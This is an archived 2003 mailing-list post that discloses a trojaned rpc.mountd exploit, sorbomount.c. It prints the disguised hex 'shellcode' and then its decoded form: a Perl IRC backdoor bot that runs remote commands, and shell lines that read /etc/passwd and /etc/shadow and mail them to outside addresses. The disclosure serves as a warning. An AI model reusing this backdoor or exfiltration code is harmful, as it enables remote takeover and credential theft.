sorbomount.c off-by-one rpc.mountd exploit trojaned
From: DownBload (downbload_at_hotmail.com)
Date: 09/21/03
- Previous message: ned: "hooking python send()"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: 21 Sep 2003 10:09:47 -0000 To: vuln-dev@securityfocus.com('binary' encoding is not supported, stored as-is)
KIDDIES ALERT!!! -> SORBOMOUNT.C EXPLOIT TROJANED!!! <- KIDDIES ALERT!!!
- If this is already well known (and it should be), just > /dev/null it.
There is sorbomount.c exploit for off-by-one bug in rpc.mountd in the wild.
Version that I got from my friend is trojaned!
Even the dumbest asm coder in the world can't write soo big port bind shellcode :-))).
It must be something else...
sorbomount.c:
char shellcode[] =
/* port bind tcp/30464 ***/
"\x65\x63\x68\x6f\x20\x27\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70"
"\x65\x72\x6c\x27\x20\x3e\x3e\x20\x61\x2e\x70\x6c\x20\x3b\x20\x65\x63\x68"
"\x6f\x20\x27\x24\x63\x68\x61\x6e\x3d\x22\x23\x6c\x61\x6d\x65\x6d\x61\x74"
"\x65\x22\x3b\x27\x20\x3e\x3e\x20\x61\x2e\x70\x6c\x20\x3b\x65\x63\x68\x6f"
"\x20\x27\x24\x6e\x69\x63\x6b\x3d\x22\x6c\x61\x6d\x65\x6d\x61\x74\x65\x22"
"\x3b\x27\x20\x3e\x3e\x20\x61\x2e\x70\x6c\x20\x3b\x65\x63\x68\x6f\x20\x27"
"\x24\x73\x65\x72\x76\x65\x72\x3d\x22\x69\x72\x63\x2e\x64\x61\x78\x6e\x65"
"\x74\x2e\x6e\x6f\x22\x3b\x27\x20\x3e\x3e\x20\x61\x2e\x70\x6c\x20\x3b\x65"
"\x63\x68\x6f\x20\x27\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d"
"\x3b\x65\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20"
"\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d"
"\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d"
"\x3e\x6e\x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36"
"\x37\x22\x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73"
"\x6f\x63\x6b\x20\x22\x55\x53\x45\x52\x20\x6c\x61\x6d\x65\x6d\x61\x74\x65"
"\x20\x2b\x69\x20\x6c\x61\x6d\x65\x6d\x61\x74\x65\x20\x3a\x6c\x61\x6d\x65"
"\x6d\x61\x74\x65\x72\x76\x32\x5c\x6e\x4e\x49\x43\x4b\x20\x6c\x61\x6d\x65"
"\x6d\x61\x74\x65\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68\x69\x6c\x65"
"\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20"
"\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64\x65\x3d\x24"
"\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65\x3d\x3d\x22"
"\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d\x22\x34\x33"
"\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d\x7e\x73\x2f"
"\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
"\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c\x6e\x22\x3b"
"\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x4a\x4f\x49"
"\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24"
"\x63\x68\x61\x6e\x20\x3a\x6c\x61\x6d\x65\x6d\x61\x74\x65\x20\x76\x32\x2e"
"\x31\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a"
"\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x2c\x20\x74"
"\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63\x6b\x2e\x22\x3a\x20\x63\x6f"
"\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x28\x3c\x24\x73"
"\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e\x47\x20\x28"
"\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b"
"\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e\x4a\x4f\x49\x4e\x20\x24\x63"
"\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28\x73\x2f\x5e\x5b\x5e\x20\x5d"
"\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24"
"\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x3a\x5b\x5e\x20\x3a\x5c"
"\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24\x31\x2f\x29\x7b\x73\x2f\x5c"
"\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24\x5f\x60\x3b\x66\x6f\x72\x65"
"\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22\x5c\x6e\x22\x29\x7b\x70\x72"
"\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x52\x49\x56\x4d\x53\x47"
"\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c\x6e\x22\x3b\x73\x6c\x65\x65"
"\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f"
"\x74\x6d\x70\x2f\x6c\x6f\x6c\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c"
"\x6c\x3b\x2f\x74\x6d\x70\x2f\x6c\x6f\x6c\x27\x20\x3e\x3e\x20\x61\x2e\x70"
"\x6c\x20\x3b\x70\x65\x72\x6c\x20\x61\x2e\x70\x6c\x3b\x20\x63\x61\x74\x20"
"\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x3e\x3e\x20\x6f\x77\x6e"
"\x2e\x74\x78\x74\x3b\x20\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73\x68\x61"
"\x64\x6f\x77\x20\x3e\x3e\x20\x6f\x77\x6e\x2e\x74\x78\x74\x20\x3b\x20\x63"
"\x61\x74\x20\x2f\x65\x74\x63\x2f\x68\x6f\x73\x74\x73\x20\x3e\x3e\x20\x6f"
"\x77\x6e\x2e\x74\x78\x74\x3b\x20\x75\x6e\x61\x6d\x65\x20\x2d\x61\x20\x3e"
"\x3e\x20\x6f\x77\x6e\x2e\x74\x78\x74\x3b\x20\x69\x66\x63\x6f\x6e\x66\x69"
"\x67\x20\x3e\x3e\x20\x6f\x77\x6e\x2e\x74\x78\x74\x3b\x20\x63\x61\x74\x20"
"\x6f\x77\x6e\x2e\x74\x78\x74\x20\x7c\x20\x6d\x61\x69\x6c\x20\x65\x61\x72"
"\x69\x61\x73\x40\x68\x75\x73\x68\x2e\x63\x6f\x6d\x20\x3b\x20\x63\x61\x74"
"\x20\x6f\x77\x6e\x2e\x74\x78\x74\x20\x7c\x20\x6d\x61\x69\x6c\x20\x53\x6f"
"\x6e\x69\x63\x6f\x36\x30\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"
"\x20\x3b\x72\x6d\x20\x2d\x72\x66\x20\x6f\x77\x6e\x2e\x74\x78\x74\x3b\x72"
"\x6d\x20\x2d\x72\x66\x20\x61\x2e\x70\x6c\x3b";
Damn, this looks nasty!!!
...
system(shellcode);
...
So, this is not real shellcode, these are just hexadecimal values of ASCII characters.
That "shellcode" will do this on your machine (or maybe already did:-))) :
---------------------------------------------------------------------------
echo '#!/usr/bin/perl' >> a.pl ;
echo '$chan="#lamemate";' >> a.pl ;
echo '$nick="lamemate";' >> a.pl ;
echo '$server="irc.daxnet.no";' >> a.pl ;
echo '$SIG{TERM}={};
exit if fork;
use IO::Socket;$sock = IO::Socket::INET->new($server.":6667") || exit;
print $sock "USER lamemate +i lamemate :lamematerv2\nNICK lamemate\n";
$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /) {
$mode=$1;
last if $mode=="001";
if($mode=="433") {
$i++;
$nick=~s/\d*$/$i/;
print $sock "NICK $nick\n";
}
}
print $sock "JOIN $chan\nPRIVMSG $chan :lamemate v2.1\nPRIVMSG $chan :to run commands, type: ".$nick.": command\n";
while(<$sock>)
{
if (/^PING (.*)$/)
{
print $sock "PONG $1\nJOIN $chan\n";
}
if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/) {
s/\s*$//;
$_=`$_`;
foreach(split "\n")
{
print $sock "PRIVMSG $chan :$_\n";
sleep 1;
}
}
}
#chmod +x /tmp/lol 2>/dev/null;/tmp/lol' >> a.pl ;
perl a.pl;
cat /etc/passwd >> own.txt;
cat /etc/shadow >> own.txt ;
cat /etc/hosts >> own.txt;
uname -a >> own.txt;
ifconfig >> own.txt;
cat own.txt | mail earias@hush.com ;
cat own.txt | mail Sonico60@hotmail.com ;
rm -rf own.txt;rm -rf a.pl;[root
---------------------------------------------------------------------------
So....
a.pl perl script is created.
This perl script will connect to irc server irc.daxnet.no as user lamemate, and will send private message to channel #lamemate. Now anyone can run commands on your machine.
After that, passwd, shadow and hosts are cat-ed to own.txt, uname and ifconfig are also redirected to own.txt.
own.txt is mailed to earias@hush.com and Sonico60@hotmail.com.
own.txt and a.pl are rm-ed.
I wonder, how many shadow files earias and Sonico60 have :-).
Poor kiddies :-PPppp.
------------------------------------
DownBload / Illegal Instruction Labs
Security Research & Education
http://www.ii-labs.org
e-mail:downbload[at]hotmail.com
"Born under the lucky star magical,
but on this earth generally tragical."
- Previous message: ned: "hooking python send()"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
